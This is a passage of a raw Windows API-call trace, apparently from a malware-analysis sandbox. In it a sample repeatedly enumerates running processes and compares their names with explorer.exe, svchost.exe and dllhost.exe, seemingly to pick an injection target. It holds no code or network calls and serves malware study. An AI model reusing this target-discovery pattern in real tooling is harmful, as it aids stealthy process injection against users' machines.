hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.124] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.124] CloseHandle (hObject=0xec) returned 1 [0249.124] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0249.124] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0249.124] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0249.124] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0249.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0249.124] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.124] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.124] CloseHandle (hObject=0xec) returned 1 [0249.124] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0249.124] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0249.124] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0249.124] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0249.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0249.125] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.125] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.125] CloseHandle (hObject=0xec) returned 1 [0249.125] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0249.125] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0249.125] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0249.125] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0249.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0249.126] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.126] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.126] CloseHandle (hObject=0xec) returned 1 [0249.126] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0249.126] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0249.126] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0249.126] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0249.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0249.126] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.126] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.126] CloseHandle (hObject=0xec) returned 1 [0249.127] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0249.127] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0249.127] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0249.127] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0249.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0249.127] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.127] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.127] CloseHandle (hObject=0xec) returned 1 [0249.127] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0249.127] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0249.127] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0249.127] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0249.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0249.128] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.128] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.128] CloseHandle (hObject=0xec) returned 1 [0249.128] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0249.128] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0249.128] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0249.128] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0249.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0249.128] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.128] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.128] CloseHandle (hObject=0xec) returned 1 [0249.129] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0249.129] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0249.129] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0249.129] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0249.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0249.129] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.129] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.129] CloseHandle (hObject=0xec) returned 1 [0249.129] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0249.129] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0249.129] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0249.129] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0249.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0249.130] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.130] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.130] CloseHandle (hObject=0xec) returned 1 [0249.130] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0249.130] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0249.130] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0249.130] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0249.130] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0249.131] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0249.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0249.131] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0249.132] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0249.132] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0249.133] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.133] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.133] CloseHandle (hObject=0xec) returned 1 [0249.133] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0249.133] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.133] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.134] CloseHandle (hObject=0xec) returned 1 [0249.134] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0249.134] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0249.135] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.135] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.135] CloseHandle (hObject=0xec) returned 1 [0249.135] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0249.135] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0249.135] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.135] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.135] CloseHandle (hObject=0xec) returned 1 [0249.135] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.136] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0249.136] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.136] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0249.136] CloseHandle (hObject=0xec) returned 1 [0249.136] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0249.137] CloseHandle (hObject=0xe8) returned 1 [0249.137] Sleep (dwMilliseconds=0x3e8) [0250.163] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0250.165] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0250.165] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0250.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0250.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0250.167] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0250.167] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0250.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0250.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0250.169] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0250.169] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0250.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0250.170] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0250.170] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0250.171] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0250.171] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0250.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0250.172] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0250.173] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0250.173] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0250.174] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0250.174] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.174] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.174] CloseHandle (hObject=0xec) returned 1 [0250.174] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0250.175] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0250.175] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.176] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.176] CloseHandle (hObject=0xec) returned 1 [0250.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0250.176] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0250.177] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0250.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0250.177] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.177] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0250.177] CloseHandle (hObject=0xec) returned 1 [0250.177] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0250.177] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0250.177] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 